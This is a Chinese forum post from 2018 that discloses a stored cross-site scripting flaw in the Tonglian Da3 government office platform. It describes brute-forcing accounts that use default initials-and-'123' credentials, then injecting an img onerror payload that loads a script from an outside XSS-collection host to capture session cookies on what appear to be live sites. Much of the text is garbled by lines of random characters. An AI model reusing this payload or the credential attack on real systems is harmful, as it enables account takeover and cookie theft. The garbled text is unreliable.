1 w% _# d( v/ O/ @4 j! H& E
- b( x V2 j* o4 I) u& m6 C 同联Da3协同办公平台后台通用储存型xss漏洞 a, x. I# T" a8 r0 p7 r. i" P
+ [. Y0 W! P3 o. Q9 ~
& s% T8 h! I( E. I; o5 s 平台简介:
4 l- `# b7 P$ a, U: P- Q! h9 v6 B
" }) l; S8 n, d- p" L+ ?0 k 9 N" y6 g; U- v0 k1 \
( n' R9 v3 z# x0 A0 ]
1 O5 s {" p8 A# I: J0 k% q5 @
r7 W0 I+ k+ T
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
/ e( C% T! {& ]0 C% O4 z同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
+ e7 z' a5 m; j! w) A1 ]% s! L
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
+ ]' S6 q$ w3 b/ T" [# {% ?
- k/ X0 Q( P3 U
( g7 [; U8 q& X8 S
8 V* a8 \: _ o$ l1 J& Z
) w6 K X9 i9 K+ |3 O 8 H5 J6 i' J4 T6 o( n$ v2 y- S
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:; q( v* g% c- w: `! X! k. ]
! I) Z* K9 p) ?: i 1 _" q j6 C+ X& w4 J* B$ i5 g
+ j; x* G8 M. o+ E
0 h( O- n0 M; I) E 0 B3 A$ h3 y( R2 x
http://1.1.1.1:7197/cap-aco/#(案例2-)
, S% ^% Y# d) w, p% N" m5 \
% s5 s7 D1 x. S! C1 _/ I2 ?4 N$ G. w
% w( E3 r2 i, i# \
http://www.XXOO.com (案例1-官网网站)
2 o& Z2 O g) V& J8 O) `
- X6 v8 ]( e, Y9 b+ W: y! k + M& D% d' p( h* [/ y* U$ h! E0 m- k
漏洞详情:2 I+ x- A: e% W% G1 O, B' D
: I" D7 L9 `9 t# h1 o
1 G% u* `, p* n% m4 U
案例一、( [* x1 ~+ B2 a' w! |
. _' |, k: ]" {' A
) q1 H9 _$ k0 s8 x 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试1 z# }9 y% G5 K% t2 S8 ^5 R [
- K1 O" H/ K! l% G
B' y& s2 J" I5 }! |+ p 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
# U+ G' d: j* L( C$ x$ s
4 w/ d" ^7 c# Y( n& Z' \0 b$ D' @
$ b1 W/ t e4 X; a) S9 L - K4 f6 e$ d" v, k0 Q$ `/ {# d0 F
. h0 [ q2 I" L8 [, H3 X# v! Q
m' l/ ?6 o( I# w0 q, f6 g 
/ \" K. _. O$ P
/ ]. \+ n% V4 i; @( L/ r1 O# Y
2 b" i* T7 @" ~& t7 d X- a( _ ^/ Z status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
/ C+ y. b. q4 V( n; I; k
+ |- J* M+ l% D2 ?6 ^
# d1 q" F2 S7 y1 `& j* [
6 n+ Q, f, ^, d! _ F5 e2 p
: G8 {0 a* [4 U5 E- G$ \ g: N. L+ S0 l
4 J$ l, L2 M" _% u
$ `, p, j e- @) O: H# \
2 s4 X% F5 v( L! H5 a 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
: a, ~4 N" k" z" e/ l% E
# n+ O/ T: Q, O- b
z" z* e u7 D* E. E $ o1 D9 [$ U: Y7 Q
- }$ A6 ~6 K; U4 X+ B
4 K# |! v& r' ~ <img src=x
1 Z7 l9 J7 s ?; ]5 gonerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
' E4 @5 C$ f" z8 t1 D6 \
9 F/ a. l, _( A/ |( {2 ^
, q$ j M2 E. F! w/ Q 
, i# ~3 Z6 e% C, e- X) a1 O$ ^5 A
: ~! }; m1 z# P2 t
3 D$ U5 t1 E% N( L* }. L3 B 然后发送,接收cookie如图:
2 L8 s1 R8 }9 k4 D- j
) ~. A; L! @: g/ g! p8 a; ^
5 l9 K& u/ l" F; S f6 c g; e |# {7 }; V
D/ \" V$ K$ t. Y8 S. P & }- r7 W& C6 G3 i" S8 Q
2 f A$ P& X# z; c2 _; P& o# F7 R
E2 S9 K2 Y2 j! i
0 E/ U4 @( l4 G6 k- g% t+ L9 |) F
. M3 P$ \; p! z6 X# E w/ N
, e7 s" R* H. p
% h, |9 ^' i6 _) `
. m( [* x4 N. o0 W
: e3 P9 R: ] L) e * P. o6 ^- x" A- D- H3 t2 k/ @
/ @5 h0 ]5 D5 S) e& L: @
: H/ Y( h* u# }6 Q
. y. }7 I' ]$ s0 ^ 
% ?, p3 I4 }' j1 T
5 Z3 h9 x7 d+ b4 [6 W5 Q7 D / X' d& Z; h/ z
/ x6 q1 H$ S+ J( S5 Z `/ T7 _6 r5 ^
1 O$ X2 B+ ?; J& x: S1 E* n
( Q) k+ L% K; m, ~( D1 e 案例2、
0 W/ @) @3 j* ]0 A2 k
7 d# y* s( U4 z4 J
2 _4 b* O8 R: r$ Z4 J 前面步骤都一样,下面看效果图:
' b% `7 m% n0 n' ^ _/ C
) m" h3 z& z% S u
3 V# i" A1 z) } e! f; p$ p9 z
" ?" N6 F p0 ^8 Y" q1 W4 d
3 {, |8 P S5 n/ j: D
7 O X4 E1 ~$ z3 l F- ?1 @
3 ~4 i6 ]1 x* h+ |. d3 c0 {
1 O) T" q, V+ b3 I; x0 f+ Y- N) H ! j0 n4 | C- k1 t I/ J
6 ^' s# C3 }# X$ f1 o4 V6 R/ e
K2 ~7 z- r0 `% _ # Q8 X) q" ~* ^) d' Q
4 S/ n# G2 k0 l; ?4 v; P
. y& _6 D J6 C: a: @% o, P 8 N" s1 i3 ]6 U
8 X5 l( ] _; `! U, y- |* p
) V; J$ _1 t' e$ V
- [0 A, T* Z8 X4 W5 o$ S 0 z1 |% k5 a, [8 }
' P; W6 s! Z- N
Q: i: H( u1 P5 B! s# t1 |/ h/ h
* W2 ~' t. \7 y/ G
+ h- I( o% T0 x 6 I( l5 K0 x0 ^/ a8 F% [( M
* O$ f/ a* I- }" K8 E5 [. N
G9 B0 e& ?# X! u }$ i
+ F$ G& i3 j+ j( t$ [& a
& s* @9 m+ C6 L/ s
~: W! v9 u% R" a% W 
发表于 2018-10-20 20:14:15
收藏
支持
反对